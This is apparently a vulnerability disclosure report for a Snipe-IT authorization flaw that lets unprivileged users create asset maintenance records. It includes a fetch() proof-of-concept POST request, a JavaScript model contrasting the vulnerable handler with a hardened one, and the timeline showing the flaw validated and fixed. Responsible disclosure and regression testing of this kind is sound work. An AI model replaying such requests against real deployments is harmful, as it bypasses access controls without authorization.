Improper Privilege Management in snipe/snipe-it

Valid

Reported on

Feb 10th 2022


Description

An unprivileged user can create a maintenance record for an asset.

Proof of Concept

1. Create a regular user and set DENY on all permissions in asset models.
2. Log in as that user and send the request below to create a maintenance record for an asset.

await fetch("https://demo.snipeitapp.com/hardware/maintenances", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1"
    },
    "referrer": "https://demo.snipeitapp.com/hardware/maintenances/create?asset_id=310",
    "body": "_token=Pvc8rsrc7DcKDjEtD6wtmstrGJfc74utYKkVfAh7&asset_id=310&supplier_id=8&asset_maintenance_type=Maintenance&title=mainrain11&start_date=2022-02-03&completion_date=&cost=&notes=by_admin",
    "method": "POST",
    "mode": "cors"
});
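
The gap the request above exploits is a missing authorization check: the handler verifies that the caller is logged in and that the asset exists, but never asks whether this user may act on that asset. The following is an added example, not Snipe-IT's own code, that models the endpoint in plain JavaScript with the defect beside the hardened form. The permission key "assets.edit", the grant/deny encoding ("1"/"-1"), the user and asset records, and the helper names are all assumptions constructed for illustration; only the form body is taken from the PoC (CSRF token omitted).

```javascript
// Added example (not Snipe-IT's code): in-memory model of a "create maintenance"
// handler, vulnerable and hardened. Permission names and data are assumptions.

// Constructed sample users. "1" = allow, "-1" = deny, absent = not granted.
const users = {
  admin:   { id: 1, permissions: { superuser: "1" } },
  regular: { id: 2, permissions: { "assets.view": "-1", "assets.edit": "-1", "assets.create": "-1" } },
};

// Constructed sample asset table keyed by id (310 matches the PoC body).
const assets = { 310: { id: 310, name: "Laptop 310" } };

// In-memory table that both handlers write to.
const maintenances = [];

// Permission check: superusers pass; otherwise the named permission must be
// explicitly "1". A deny ("-1") or a missing entry fails closed.
function hasPermission(user, name) {
  if (user.permissions.superuser === "1") return true;
  return user.permissions[name] === "1";
}

// Parse an application/x-www-form-urlencoded body into a plain object.
function parseForm(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// VULNERABLE: authentication and existence checks only. Any logged-in user,
// even one with every asset permission denied, can create the record.
function createMaintenanceVulnerable(user, body) {
  if (!user) return { status: 302, error: "login required" };
  const form = parseForm(body);
  const asset = assets[form.asset_id];
  if (!asset) return { status: 404, error: "asset not found" };
  const record = { id: maintenances.length + 1, asset_id: asset.id, title: form.title, created_by: user.id };
  maintenances.push(record);
  return { status: 201, record };
}

// HARDENED: same handler with an authorization check before any lookup or
// write. Checking the permission before the asset lookup also avoids telling
// an unauthorized caller whether a given asset id exists.
function createMaintenanceHardened(user, body) {
  if (!user) return { status: 302, error: "login required" };
  if (!hasPermission(user, "assets.edit")) {           // assumed permission name
    return { status: 403, error: "not authorized to add maintenance for assets" };
  }
  const form = parseForm(body);
  const asset = assets[form.asset_id];
  if (!asset) return { status: 404, error: "asset not found" };
  const record = { id: maintenances.length + 1, asset_id: asset.id, title: form.title, created_by: user.id };
  maintenances.push(record);
  return { status: 201, record };
}

// Form body from the report's PoC, minus the CSRF token (irrelevant here).
const pocBody = "asset_id=310&supplier_id=8&asset_maintenance_type=Maintenance" +
  "&title=mainrain11&start_date=2022-02-03&completion_date=&cost=&notes=by_admin";

// Replay the PoC body as the denied user against both handlers.
function demo() {
  return {
    vulnerable: createMaintenanceVulnerable(users.regular, pocBody).status,  // 201
    hardened: createMaintenanceHardened(users.regular, pocBody).status,      // 403
    hardenedAdmin: createMaintenanceHardened(users.admin, pocBody).status,   // 201
  };
}

console.log(demo());
```

The useful regression test for a fix like this is the second line of `demo()`: a user whose asset permissions are all denied must get a 403 from the endpoint, and the test should be run against the real route rather than the model, since the defect is that the route never consulted the permission at all.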

Impact

An unprivileged user can create maintenance records for any asset.

We are processing your report and will contact the snipe/snipe-it team within 24 hours. 4 months ago
We have contacted a member of the snipe/snipe-it team and are waiting to hear back 4 months ago
We have sent a follow up to the snipe/snipe-it team. We will try again in 7 days. 3 months ago
snipe (Maintainer), 3 months ago:

"Create regular user and set DENY to all permissions in asset models."

Assets or asset models?

snipe validated this vulnerability 3 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
snipe confirmed that a fix has been merged on 321be4 3 months ago
snipe has been awarded the fix bounty